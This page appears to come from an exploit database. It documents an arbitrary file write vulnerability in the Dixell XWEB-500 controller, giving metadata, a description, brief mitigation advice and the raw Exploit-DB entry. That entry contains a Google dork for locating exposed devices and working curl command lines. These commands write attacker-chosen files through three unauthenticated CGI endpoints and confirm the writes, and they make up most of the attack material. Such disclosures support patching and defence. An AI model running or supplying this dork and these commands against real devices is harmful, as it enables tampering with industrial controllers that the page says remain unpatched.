header-logo
Suggest Exploit
vendor:
Dixell XWEB-500
by:
Roberto Palamaro
N/A
CVSS
MEDIUM
Arbitrary File Write
22
CWE
Product Name: Dixell XWEB-500
Affected Version From: XWEB-500
Affected Version To: XWEB-500
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Dixell XWEB-500
2022

Dixell XWEB-500 – Arbitrary File Write

Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability. The exploit allows an attacker to write arbitrary files on the target system using various endpoints such as logo_extra_upload.cgi, lo_utils.cgi, and cal_save.cgi. The attacker can specify the filename and content of the file to be written.

Mitigation:

Apply the latest patch or update from the vendor. Restrict access to the affected endpoints from untrusted networks. Regularly monitor and review file upload functionality for any suspicious activity.
Source

Exploit-DB raw data:

# Exploit Title: Dixell XWEB-500 - Arbitrary File Write
# Google Dork: inurl:"xweb500.cgi"
# Date: 03/01/2022
# Exploit Author: Roberto Palamaro
# Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it
# Version: XWEB-500
# Tested on: Dixell XWEB-500
# References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/

# Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability

# Endpoint: logo_extra_upload.cgi
# Here the first line of the POC is the filename and the second one is the content of the file be written
# Write file
echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Verify
curl -A Chrome -is "http://[target]:[port]/logo/"

# Endpoint: lo_utils.cgi
# Here ACTION=5 is to enable write mode
echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' 
# Verify using ACTION=3 to listing resources
echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'

# Endpoint: cal_save.cgi
# Here the first line of the POC is the filename and the second one is the content of the file be written
echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Verify
curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi